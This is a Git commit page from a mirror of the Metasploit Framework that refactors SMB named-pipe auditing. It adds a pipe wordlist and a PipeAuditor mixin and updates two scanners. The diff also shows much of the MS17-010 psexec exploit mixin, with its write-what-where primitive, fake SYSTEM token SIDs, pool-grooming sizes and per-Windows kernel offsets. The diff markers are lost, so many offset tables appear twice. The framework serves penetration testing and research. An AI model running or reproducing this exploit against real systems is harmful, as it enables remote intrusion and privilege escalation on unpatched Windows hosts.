infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #9618, pipe auditing improvements

4.x
William Vu 2018-03-26 17:01:48 -05:00 committed by Jeffrey Martin
parent 72d2b46ac8
commit c31a8ab687
No known key found for this signature in database
GPG Key ID: 0CD9BBC2AF15F171
6 changed files with 316 additions and 291 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
data/wordlists/named_pipes.txt Normal file
View File

@ -0,0 +1,25 @@
netlogon
lsarpc
samr
browser
atsvc
DAV RPC SERVICE
epmapper
eventlog
InitShutdown
keysvc
lsass
LSM_API_service
ntsvcs
plugplay
protected_storage
router
SapiServerPipeS-1-5-5-0-70123
scerpc
srvsvc
tapsrv
trkwks
W32TIME_ALT
wkssvc
PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
db2remotecmd

1
lib/msf/core/exploit/mixins.rb
View File

@ -32,6 +32,7 @@ require 'msf/core/exploit/smb/client'
require 'msf/core/exploit/smb/client/authenticated'
require 'msf/core/exploit/smb/client/local_paths'
require 'msf/core/exploit/smb/client/psexec'
require 'msf/core/exploit/smb/client/pipe_auditor'
require 'msf/core/exploit/smb/client/psexec_ms17_010'
require 'msf/core/exploit/smb/client/remote_paths'
require 'msf/core/exploit/smb/server'

61
lib/msf/core/exploit/smb/client/pipe_auditor.rb Normal file
View File

@ -0,0 +1,61 @@
# -*- coding: binary -*-
#
# This mixin implements the pipe_auditor module's primary functionality
#
module Msf
module Exploit::Remote::SMB::Client::PipeAuditor
include Msf::Exploit::Remote::SMB::Client
def initialize(info = {})
super
named_pipes = File.join(Msf::Config.data_directory, 'wordlists', 'named_pipes.txt')
register_options([
OptPath.new('NAMED_PIPES', [true, 'List of named pipes to check', named_pipes])
])
end
# Check named pipes, returning the first optionally
#
# @param check_first [Array] Check the specified pipes first
# @param return_first [Boolean] Return the first pipe name and handle
# @return [Array] The list of found pipes (name and handle)
def check_named_pipes(check_first: [], return_first: false)
@found_pipes = []
if check_first.is_a?(Array)
check_first.delete_if { |pipe| pipe.blank? }
elsif check_first.is_a?(String) && check_first.present?
check_first = [check_first]
else
check_first = []
end
named_pipes = check_first + File.readlines(datastore['NAMED_PIPES'])
named_pipes.each do |pipe|
begin
pipe_name = pipe.strip
pipe_handle = self.simple.create_pipe(pipe_name, 'o')
# If we make it this far, it succeeded
vprint_status("Connected to named pipe: #{pipe_name}")
# This is for exploits like ms17_010_psexec
return pipe_name, pipe_handle if return_first
@found_pipes << [pipe_name, pipe_handle]
rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
vprint_error("Inaccessible named pipe: #{pipe_name} - #{e.message}")
end
end
@found_pipes
end
end
end

454
lib/msf/core/exploit/smb/client/psexec_ms17_010.rb
View File

@ -1,8 +1,8 @@
module Msf
module Exploit::Remote::SMB::Client::Psexec_MS17_010
include Msf::Exploit::Remote::SMB::Client::Psexec
include Msf::Exploit::Remote::SMB::Client::PipeAuditor
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
@ -231,7 +231,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
return userAndGroupsAddr, userAndGroupCount
end
def write_what_where(what, where)
if where == 0
raise MS17_010_Error, 'Attempted to write to a NULL pointer!'
@ -331,26 +330,17 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
end
end
def find_accessible_named_pipe()
pipes = if datastore['NAMEDPIPE'] != '' then [datastore['NAMEDPIPE']] else @@target_pipes end
def find_accessible_named_pipe
@ctx['pipe_name'], pipe_handle = check_named_pipes(
check_first: datastore['NAMEDPIPE'],
return_first: true
)
pipes.each do |pipe|
begin
pipe_name = "#{pipe}"
pipe_handle = self.simple.create_pipe(pipe_name, 'o')
# if we make it this far, it succeeded
vprint_status("Connected to named pipe: #{pipe}")
@ctx['pipe_name'] = pipe_name
return pipe_handle
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
vprint_error("Inaccessible named pipe: #{pipe} - #{e.message}")
end
if @ctx['pipe_name'] && pipe_handle
pipe_handle
else
raise MS17_010_Error, 'Unable to find accessible named pipe!'
end
raise MS17_010_Error, "Unable to find accessible named pipe!"
end
# todo: spice it up with EternalSynergy output
@ -368,7 +358,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
# groom: srv buffer header
@ctx['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + @ctx['SRV_BUFHDR_SIZE'] + @ctx['POOL_ALIGN'], @ctx['POOL_ALIGN'])
# groom paramters and data is alignment by 8 because it is NT_TRANS
@ctx['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - TRANS_NAME_LEN - 4 - @ctx['TRANS_SIZE'] # alignment (4)
@ -376,7 +365,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
bridePoolSize = 0x1000 - (@ctx['GROOM_POOL_SIZE'] & 0xfff) - @ctx['FRAG_POOL_SIZE']
@ctx['BRIDE_TRANS_SIZE'] = bridePoolSize - (@ctx['SRV_BUFHDR_SIZE'] + @ctx['POOL_ALIGN'])
if datastore['DBGTRACE']
print_status("GROOM_POOL_SIZE: 0x#{@ctx['GROOM_POOL_SIZE'].to_s(16)}")
print_status("BRIDE_TRANS_SIZE: 0x#{@ctx['BRIDE_TRANS_SIZE'].to_s(16)}")
@ -391,7 +379,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
for i in 0..datastore['LEAKATTEMPTS']
reset_extra_multiplex_id()
vprint_status("Attempting leak ##{i.to_s}")
leakInfo = align_transaction_and_leak(pipe_handle)
@ -416,7 +403,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
pipe_handle = self.simple.create_pipe(@ctx['pipe_name'], 'o')
end
@ctx['fid'] = pipe_handle.file_id
@ctx['pipe_handle'] = pipe_handle
@ctx = @ctx.merge(leakInfo)
@ -699,7 +685,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
end
if not success
print_status("<---------------- | Leaving Danger Zone | ---------------->")
raise MS17_010_Error, "Unable to control groom transaction"
@ -823,7 +808,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
@ctx['trans2_addr'] = trans2_addr
end
def create_fake_SYSTEM_UserAndGroups(userAndGroupCount, userAndGroupsAddr)
xSID_SYSTEM = "\x01\x01\x00\x00\x00\x00\x00\x05\x12\x00\x00\x00" # pack('<BB5xB'+'I', 1, 1, 5, 18)
xSID_ADMINISTRATORS = "\x01\x02\x00\x00\x00\x00\x00\x05\x20\x00\x00\x00\x20\x02\x00\x00" #pack('<BB5xB'+'II', 1, 2, 5, 32, 544)
@ -1182,254 +1166,222 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
return (size + align_size - 1) & ~(align_size - 1)
end
WIN7_64_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0xa0,
'SESSION_ISNULL_OFFSET'=> 0xba,
'FAKE_SECCTX'=> [0x28022a, 1, 0, 0, 2, 0, 1].pack("VVQ<Q<VVC"), #pack('<IIQQIIB', 0x28022a, 1, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x28,
}
# we will iter these if one is not specified
@@target_pipes = [
'netlogon',
'lsarpc',
'samr',
'browser',
'atsvc',
'DAV RPC SERVICE',
'epmapper',
'eventlog',
'InitShutdown',
'keysvc',
'lsass',
'LSM_API_service',
'ntsvcs',
'plugplay',
'protected_storage',
'router',
'SapiServerPipeS-1-5-5-0-70123',
'scerpc',
'srvsvc',
'tapsrv',
'trkwks',
'W32TIME_ALT',
'wkssvc',
'PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER',
'db2remotecmd'
]
WIN7_32_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0x80,
'SESSION_ISNULL_OFFSET'=> 0x96,
'FAKE_SECCTX'=> [0x1c022a, 1, 0, 0, 2, 0, 1].pack("VVVVVVC"), #pack('<IIIIIIB', 0x1c022a, 1, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x1c,
}
WIN7_64_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0xa0,
'SESSION_ISNULL_OFFSET'=> 0xba,
'FAKE_SECCTX'=> [0x28022a, 1, 0, 0, 2, 0, 1].pack("VVQ<Q<VVC"), #pack('<IIQQIIB', 0x28022a, 1, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x28,
}
# win8+ info
WIN8_64_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0xb0,
'SESSION_ISNULL_OFFSET'=> 0xca,
'FAKE_SECCTX'=> [0x38022a, 1, 0, 0, 0, 0, 2, 0, 1].pack("VVQ<Q<Q<Q<VVC"), #pack('<IIQQQQIIB', 0x38022a, 1, 0, 0, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x38,
}
WIN7_32_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0x80,
'SESSION_ISNULL_OFFSET'=> 0x96,
'FAKE_SECCTX'=> [0x1c022a, 1, 0, 0, 2, 0, 1].pack("VVVVVVC"), #pack('<IIIIIIB', 0x1c022a, 1, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x1c,
}
WIN8_32_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0x88,
'SESSION_ISNULL_OFFSET'=> 0x9e,
'FAKE_SECCTX'=> [0x24022a, 1, 0, 0, 0, 0, 2, 0, 1].pack("VVVVVVVVC"), # pack('<IIIIIIIIB', 0x24022a, 1, 0, 0, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x24,
}
# win8+ info
WIN8_64_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0xb0,
'SESSION_ISNULL_OFFSET'=> 0xca,
'FAKE_SECCTX'=> [0x38022a, 1, 0, 0, 0, 0, 2, 0, 1].pack("VVQ<Q<Q<Q<VVC"), #pack('<IIQQQQIIB', 0x38022a, 1, 0, 0, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x38,
}
# win 2003 (xp 64 bit is win 2003)
WIN2K3_64_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0xba,
'SESSION_SECCTX_OFFSET'=> 0xa0, # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
'SECCTX_PCTXTHANDLE_OFFSET'=> 0x10, # PCtxtHandle is at offset 0x8 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x40,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
}
WIN8_32_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0x88,
'SESSION_ISNULL_OFFSET'=> 0x9e,
'FAKE_SECCTX'=> [0x24022a, 1, 0, 0, 0, 0, 2, 0, 1].pack("VVVVVVVVC"), # pack('<IIIIIIIIB', 0x24022a, 1, 0, 0, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x24,
}
WIN2K3_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x96,
'SESSION_SECCTX_OFFSET'=> 0x80, # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
'SECCTX_PCTXTHANDLE_OFFSET'=> 0xc, # PCtxtHandle is at offset 0x8 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
}
# win 2003 (xp 64 bit is win 2003)
WIN2K3_64_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0xba,
'SESSION_SECCTX_OFFSET'=> 0xa0, # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
'SECCTX_PCTXTHANDLE_OFFSET'=> 0x10, # PCtxtHandle is at offset 0x8 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x40,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
}
# win xp
WINXP_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x94,
'SESSION_SECCTX_OFFSET'=> 0x84, # PCtxtHandle is at offset 0x80 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'=> 0x40,
'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'=> 0x5c,
}
WIN2K3_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x96,
'SESSION_SECCTX_OFFSET'=> 0x80, # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
'SECCTX_PCTXTHANDLE_OFFSET'=> 0xc, # PCtxtHandle is at offset 0x8 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
}
WIN2K_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x94,
'SESSION_SECCTX_OFFSET'=> 0x84, # PCtxtHandle is at offset 0x80 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x3c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x58,
}
# win xp
WINXP_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x94,
'SESSION_SECCTX_OFFSET'=> 0x84, # PCtxtHandle is at offset 0x80 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'=> 0x40,
'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'=> 0x5c,
}
# for windows 2008+
WIN7_32_TRANS_INFO = {
'TRANS_SIZE' => 0xa0, # struct size
'TRANS_FLINK_OFFSET' => 0x18,
'TRANS_INPARAM_OFFSET' => 0x40,
'TRANS_OUTPARAM_OFFSET' => 0x44,
'TRANS_INDATA_OFFSET' => 0x48,
'TRANS_OUTDATA_OFFSET' => 0x4c,
'TRANS_PARAMCNT_OFFSET' => 0x58,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x5c,
'TRANS_FUNCTION_OFFSET' => 0x72,
'TRANS_MID_OFFSET' => 0x80,
}
WIN2K_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x94,
'SESSION_SECCTX_OFFSET'=> 0x84, # PCtxtHandle is at offset 0x80 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x3c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x58,
}
WIN7_64_TRANS_INFO = {
'TRANS_SIZE' => 0xf8, # struct size
'TRANS_FLINK_OFFSET' => 0x28,
'TRANS_INPARAM_OFFSET' => 0x70,
'TRANS_OUTPARAM_OFFSET' => 0x78,
'TRANS_INDATA_OFFSET' => 0x80,
'TRANS_OUTDATA_OFFSET' => 0x88,
'TRANS_PARAMCNT_OFFSET' => 0x98,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x9c,
'TRANS_FUNCTION_OFFSET' => 0xb2,
'TRANS_MID_OFFSET' => 0xc0,
}
# for windows 2008+
WIN7_32_TRANS_INFO = {
'TRANS_SIZE' => 0xa0, # struct size
'TRANS_FLINK_OFFSET' => 0x18,
'TRANS_INPARAM_OFFSET' => 0x40,
'TRANS_OUTPARAM_OFFSET' => 0x44,
'TRANS_INDATA_OFFSET' => 0x48,
'TRANS_OUTDATA_OFFSET' => 0x4c,
'TRANS_PARAMCNT_OFFSET' => 0x58,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x5c,
'TRANS_FUNCTION_OFFSET' => 0x72,
'TRANS_MID_OFFSET' => 0x80,
}
WIN5_32_TRANS_INFO = {
'TRANS_SIZE' => 0x98, # struct size
'TRANS_FLINK_OFFSET' => 0x18,
'TRANS_INPARAM_OFFSET' => 0x3c,
'TRANS_OUTPARAM_OFFSET' => 0x40,
'TRANS_INDATA_OFFSET' => 0x44,
'TRANS_OUTDATA_OFFSET' => 0x48,
'TRANS_PARAMCNT_OFFSET' => 0x54,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x58,
'TRANS_FUNCTION_OFFSET' => 0x6e,
'TRANS_PID_OFFSET' => 0x78,
'TRANS_MID_OFFSET' => 0x7c,
}
WIN7_64_TRANS_INFO = {
'TRANS_SIZE' => 0xf8, # struct size
'TRANS_FLINK_OFFSET' => 0x28,
'TRANS_INPARAM_OFFSET' => 0x70,
'TRANS_OUTPARAM_OFFSET' => 0x78,
'TRANS_INDATA_OFFSET' => 0x80,
'TRANS_OUTDATA_OFFSET' => 0x88,
'TRANS_PARAMCNT_OFFSET' => 0x98,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x9c,
'TRANS_FUNCTION_OFFSET' => 0xb2,
'TRANS_MID_OFFSET' => 0xc0,
}
WIN5_64_TRANS_INFO = {
'TRANS_SIZE' => 0xe0, # struct size
'TRANS_FLINK_OFFSET' => 0x28,
'TRANS_INPARAM_OFFSET' => 0x68,
'TRANS_OUTPARAM_OFFSET' => 0x70,
'TRANS_INDATA_OFFSET' => 0x78,
'TRANS_OUTDATA_OFFSET' => 0x80,
'TRANS_PARAMCNT_OFFSET' => 0x90,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x94,
'TRANS_FUNCTION_OFFSET' => 0xaa,
'TRANS_PID_OFFSET' => 0xb4,
'TRANS_MID_OFFSET' => 0xb8,
}
WIN5_32_TRANS_INFO = {
'TRANS_SIZE' => 0x98, # struct size
'TRANS_FLINK_OFFSET' => 0x18,
'TRANS_INPARAM_OFFSET' => 0x3c,
'TRANS_OUTPARAM_OFFSET' => 0x40,
'TRANS_INDATA_OFFSET' => 0x44,
'TRANS_OUTDATA_OFFSET' => 0x48,
'TRANS_PARAMCNT_OFFSET' => 0x54,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x58,
'TRANS_FUNCTION_OFFSET' => 0x6e,
'TRANS_PID_OFFSET' => 0x78,
'TRANS_MID_OFFSET' => 0x7c,
}
X86_INFO = {
'ARCH' => 'x86',
'PTR_SIZE' => 4,
'PTR_FMT' => 'V',
'FRAG_TAG_OFFSET' => 12,
'POOL_ALIGN' => 8,
'SRV_BUFHDR_SIZE' => 8,
}
WIN5_64_TRANS_INFO = {
'TRANS_SIZE' => 0xe0, # struct size
'TRANS_FLINK_OFFSET' => 0x28,
'TRANS_INPARAM_OFFSET' => 0x68,
'TRANS_OUTPARAM_OFFSET' => 0x70,
'TRANS_INDATA_OFFSET' => 0x78,
'TRANS_OUTDATA_OFFSET' => 0x80,
'TRANS_PARAMCNT_OFFSET' => 0x90,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x94,
'TRANS_FUNCTION_OFFSET' => 0xaa,
'TRANS_PID_OFFSET' => 0xb4,
'TRANS_MID_OFFSET' => 0xb8,
}
X64_INFO = {
'ARCH' => 'x64',
'PTR_SIZE' => 8,
'PTR_FMT' => 'Q<',
'FRAG_TAG_OFFSET' => 0x14,
'POOL_ALIGN' => 0x10,
'SRV_BUFHDR_SIZE' => 0x10,
}
X86_INFO = {
'ARCH' => 'x86',
'PTR_SIZE' => 4,
'PTR_FMT' => 'V',
'FRAG_TAG_OFFSET' => 12,
'POOL_ALIGN' => 8,
'SRV_BUFHDR_SIZE' => 8,
}
X64_INFO = {
'ARCH' => 'x64',
'PTR_SIZE' => 8,
'PTR_FMT' => 'Q<',
'FRAG_TAG_OFFSET' => 0x14,
'POOL_ALIGN' => 0x10,
'SRV_BUFHDR_SIZE' => 0x10,
}
OS_ARCH_INFO = {
# for Windows Vista, 2008, 7 and 2008 R2
'WIN7' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN7_32_TRANS_INFO,
'SESSION' => WIN7_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN7_64_TRANS_INFO,
'SESSION' => WIN7_64_SESSION_INFO
},
OS_ARCH_INFO = {
# for Windows Vista, 2008, 7 and 2008 R2
'WIN7' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN7_32_TRANS_INFO,
'SESSION' => WIN7_32_SESSION_INFO
},
# for Windows 8 and later
'WIN8' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN7_32_TRANS_INFO,
'SESSION' => WIN8_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN7_64_TRANS_INFO,
'SESSION' => WIN8_64_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN7_64_TRANS_INFO,
'SESSION' => WIN7_64_SESSION_INFO
},
'WINXP' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WINXP_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN5_64_TRANS_INFO,
'SESSION' => WIN2K3_64_SESSION_INFO
},
},
# for Windows 8 and later
'WIN8' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN7_32_TRANS_INFO,
'SESSION' => WIN8_32_SESSION_INFO
},
'WIN2K3' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WIN2K3_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN5_64_TRANS_INFO,
'SESSION' => WIN2K3_64_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN7_64_TRANS_INFO,
'SESSION' => WIN8_64_SESSION_INFO
},
'WIN2K' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WIN2K_32_SESSION_INFO
},
},
'WINXP' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WINXP_32_SESSION_INFO
},
}
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN5_64_TRANS_INFO,
'SESSION' => WIN2K3_64_SESSION_INFO
},
},
'WIN2K3' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WIN2K3_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN5_64_TRANS_INFO,
'SESSION' => WIN2K3_64_SESSION_INFO
},
},
'WIN2K' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WIN2K_32_SESSION_INFO
},
},
}
def pick_ctx()
pick = OS_ARCH_INFO[@ctx['os']][@ctx['arch']]
@ctx = @ctx.merge(pick['CPUARCH'])
@ctx = @ctx.merge(pick['OFFSETS'])
@ctx = @ctx.merge(pick['SESSION'])
@ctx
end
def pick_ctx()
pick = OS_ARCH_INFO[@ctx['os']][@ctx['arch']]
@ctx = @ctx.merge(pick['CPUARCH'])
@ctx = @ctx.merge(pick['OFFSETS'])
@ctx = @ctx.merge(pick['SESSION'])
@ctx
end
GROOM_TRANS_SIZE = 0x5010 # includes transaction name, parameters and data, multiple of 16 to make FRAG_TAG_OFFSET valid
TRANS_NAME_LEN = 4
GROOM_TRANS_SIZE = 0x5010 # includes transaction name, parameters and data, multiple of 16 to make FRAG_TAG_OFFSET valid
TRANS_NAME_LEN = 4
X64_FRAG_TAG_OFFSET = 0x14
X64_POOL_ALIGN = 0x10
X64_FRAG_TAG_OFFSET = 0x14
X64_POOL_ALIGN = 0x10
X86_FRAG_TAG_OFFSET = 0x0c
X86_POOL_ALIGN = 0x08
X86_FRAG_TAG_OFFSET = 0x0c
X86_POOL_ALIGN = 0x08
end
end

43
modules/auxiliary/scanner/smb/pipe_auditor.rb
View File

@ -8,6 +8,7 @@ class MetasploitModule < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::SMB::Client
include Msf::Exploit::Remote::SMB::Client::Authenticated
include Msf::Exploit::Remote::SMB::Client::PipeAuditor
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
@ -24,34 +25,6 @@ class MetasploitModule < Msf::Auxiliary
deregister_options('RPORT')
end
@@target_pipes = [
'netlogon',
'lsarpc',
'samr',
'browser',
'atsvc',
'DAV RPC SERVICE',
'epmapper',
'eventlog',
'InitShutdown',
'keysvc',
'lsass',
'LSM_API_service',
'ntsvcs',
'plugplay',
'protected_storage',
'router',
'SapiServerPipeS-1-5-5-0-70123',
'scerpc',
'srvsvc',
'tapsrv',
'trkwks',
'W32TIME_ALT',
'wkssvc',
'PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER',
'db2remotecmd'
]
# Fingerprint a single host
def run_host(ip)
@ -65,14 +38,8 @@ class MetasploitModule < Msf::Auxiliary
begin
connect()
smb_login()
@@target_pipes.each do |pipe|
begin
fid = smb_create("\\#{pipe}")
#print_status("Opened pipe \\#{pipe}")
pass.push(pipe)
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
#print_error("Could not open \\#{pipe}: Error 0x%.8x" % e.error_code)
end
check_named_pipes.each do |pipe_name, _|
pass.push(pipe_name)
end
disconnect()
@ -85,14 +52,14 @@ class MetasploitModule < Msf::Auxiliary
end
if(pass.length > 0)
print_status("Pipes: #{pass.map{|c| "\\#{c}"}.join(", ")}")
print_good("Pipes: #{pass.map{|c| "\\#{c}"}.join(", ")}")
# Add Report
report_note(
:host => ip,
:proto => 'tcp',
:sname => 'smb',
:port => rport,
:type => 'Pipes Founded',
:type => 'Pipes Found',
:data => "Pipes: #{pass.map{|c| "\\#{c}"}.join(", ")}"
)
end

23
modules/auxiliary/scanner/smb/smb_ms17_010.rb
View File

@ -7,6 +7,7 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB::Client
include Msf::Exploit::Remote::SMB::Client::Authenticated
include Msf::Exploit::Remote::SMB::Client::PipeAuditor
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
@ -51,8 +52,9 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptBool.new('CHECK_DOPU', [true, 'Check for DOUBLEPULSAR on vulnerable hosts', true]),
OptBool.new('CHECK_ARCH', [true, 'Check for architecture on vulnerable hosts', true])
OptBool.new('CHECK_DOPU', [false, 'Check for DOUBLEPULSAR on vulnerable hosts', true]),
OptBool.new('CHECK_ARCH', [false, 'Check for architecture on vulnerable hosts', true]),
OptBool.new('CHECK_PIPE', [false, 'Check for named pipe on vulnerable hosts', false])
])
end
@ -113,6 +115,23 @@ class MetasploitModule < Msf::Auxiliary
)
end
end
if datastore['CHECK_PIPE']
pipe_name, _ = check_named_pipes(return_first: true)
return unless pipe_name
print_good("Named pipe found: #{pipe_name}")
report_note(
host: ip,
port: rport,
proto: 'tcp',
sname: 'smb',
type: 'MS17-010 Named Pipe',
data: pipe_name
)
end
elsif status == "STATUS_ACCESS_DENIED" or status == "STATUS_INVALID_HANDLE"
# STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)
print_error("Host does NOT appear vulnerable.")